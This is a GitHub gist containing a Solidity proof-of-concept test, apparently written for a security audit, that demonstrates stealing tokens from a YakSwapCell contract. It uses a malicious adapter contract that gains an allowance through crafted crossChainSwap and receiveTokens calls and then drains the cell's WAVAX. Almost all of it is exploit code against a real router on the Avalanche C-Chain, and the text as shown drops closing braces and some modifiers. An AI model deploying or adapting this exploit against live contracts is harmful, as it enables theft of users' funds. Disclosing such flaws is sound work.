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Last active September 13, 2024 18:50
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  • Save KumaCrypto/a6efc948ed41c1437ac9edbc6104d749 to your computer and use it in GitHub Desktop.
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// Place the code below to the `test` folder and execute (this will fork the Avalanche C-Chain and use the real yak router):
// ```sh
// forge test -f --mt test_possibleToStealTokensFromYakSwapCell
// ```
// SPDX-License-Identifier: MIT
pragma solidity 0.8.18;
import "./BaseTest.t.sol";
import "./../src/YakSwapCell.sol";
contract YakSwapCellTest is BaseTest {
address internal constant YAK_SWAP_ROUTER = 0xC4729E56b831d74bBc18797e0e17A295fA77488c;
uint256 internal constant TARGET_BALANCE_START = 100e18;
YakSwapCell internal targetCell;
Attacker internal attacker;
function setUp() public override {
targetCell = new YakSwapCell(YAK_SWAP_ROUTER);
attacker = new Attacker(address(targetCell), WAVAX);
deal(WAVAX, address(targetCell), TARGET_BALANCE_START);
// Give same amount of tokens to the attacker contract
deal(WAVAX, address(attacker), TARGET_BALANCE_START);
function test_possibleToStealTokensFromYakSwapCell() external {
Hop[] memory hops = new Hop[](1);
// Place the address of token you want to steal at the last position
address[] memory path = new address[](2);
path[0] = USDC;
path[1] = WAVAX;
// Place attacker contract as adapter
address[] memory adapters = new address[](1);
adapters[0] = address(attacker);
Trade memory trade = Trade({amountIn: 0, amountOut: 0, path: path, adapters: adapters});
// Leave other parameters with default values
hops[0].action = Action.SwapAndTransfer;
hops[0].trade = abi.encode(trade);
Instructions memory instructions;
// Get tokens to this contract
instructions.receiver = address(this);
instructions.hops = hops;
assertEq(IERC20(WAVAX).balanceOf(address(targetCell)), TARGET_BALANCE_START); // Cell has initial balance
assertEq(IERC20(WAVAX).allowance(address(targetCell), address(attacker)), 0); // No allowance from cell to the attacker contract
assertEq(IERC20(WAVAX).balanceOf(address(this)), 0); // Zero balance of this contract
// Give 0 USDC to the contract with malicious trade
targetCell.crossChainSwap(USDC, 0, instructions);
assertEq(IERC20(WAVAX).balanceOf(address(this)), TARGET_BALANCE_START); // This contract balance increased
assertEq(IERC20(WAVAX).allowance(address(targetCell), address(attacker)), TARGET_BALANCE_START); // Allowance to the attacker balance increased
attacker.pullTokensFrom(WAVAX, address(targetCell), address(this), TARGET_BALANCE_START);
assertEq(IERC20(WAVAX).balanceOf(address(targetCell)), 0); // Cell is empty
contract Attacker {
using SafeERC20 for IERC20;
YakSwapCell internal targetCell;
IERC20 internal token;
address internal immutable owner;
constructor(address target, address targetToken) {
owner = msg.sender;
targetCell = YakSwapCell(target);
token = IERC20(targetToken);
function swap(
uint256, /*_amountIn*/
uint256, /*_amountOut*/
address, /*_fromToken*/
address, /*_toToken*/
address /*_to*/
) external {
Hop[] memory hops = new Hop[](2);
hops[0].action = Action.SwapAndTransfer;
hops[0].bridgePath.bridgeDestinationChain = address(this); // This contract will receive allowance
// No path -> in the `YakSwapCell._swap` will return false and trigger send tokens back from the 1 hop
Trade memory trade = Trade({amountIn: 0, amountOut: 0, path: new address[](0), adapters: new address[](0)});
hops[1].action = Action.SwapAndTransfer;
hops[1].trade = abi.encode(trade);
Instructions memory instructions;
instructions.hops = hops;
CellPayload memory payload = CellPayload({instructions: instructions, hop: 0});
uint256 amount = token.balanceOf(address(this));
require(amount > 0, "No balance for attack");
token.forceApprove(address(targetCell), amount);
targetCell.receiveTokens(bytes32(0), address(0), address(0), address(token), amount, abi.encode(payload));
function pullTokensFrom(address tokenToTransfer, address from, address to, uint256 amount) external {
assert(owner == msg.sender);
IERC20(tokenToTransfer).safeTransferFrom(from, to, amount);
// ==== Dummy functions ====
function query(uint256, /* _amountIn*/ address, /*_tokenIn*/ address /*_tokenOut*/ )
returns (uint256)
return type(uint256).max;
function send(SendTokensInput calldata, /*input*/ uint256 /*amount*/ ) external {}
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